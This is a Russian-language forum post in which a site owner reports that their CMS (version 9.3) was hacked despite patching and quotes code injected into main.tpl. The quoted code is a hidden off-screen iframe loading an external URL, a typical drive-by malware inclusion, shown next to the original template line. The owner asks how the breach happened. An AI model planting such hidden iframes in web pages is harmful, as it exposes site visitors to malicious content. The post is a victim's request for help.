Взломали сайт, все патчи ставились. в Прием багов Опубликовано: 22 ноября 2017 Вчера обнаружил взлом сайта (чужой код обнаружен через сутки после взлома), все обновления и патчи вроде ставились. Версия движка - 9.3. В main.tpl появилась вот такая вставка: <noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript><iframe src="http://forum.academy.com.ua/styles/subsilver2/theme/images/" width=14 height=14 style="position:absolute; left:-9999px;"></iframe> До взлома было вот так: <noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript> Уважаемые админы подскажите, как произошел данный взлом, какой патч нужно использовать, чтобы закрыть уязвимость. Старался ставить все патчи, возможно какой-то не установлен или это новый вид уязвимости?
Взломали сайт, все патчи ставились.
в Прием багов
Опубликовано:
Вчера обнаружил взлом сайта (чужой код обнаружен через сутки после взлома), все обновления и патчи вроде ставились.
Версия движка - 9.3.
В main.tpl появилась вот такая вставка:
До взлома было вот так:
Уважаемые админы подскажите, как произошел данный взлом, какой патч нужно использовать, чтобы закрыть уязвимость.
Старался ставить все патчи, возможно какой-то не установлен или это новый вид уязвимости?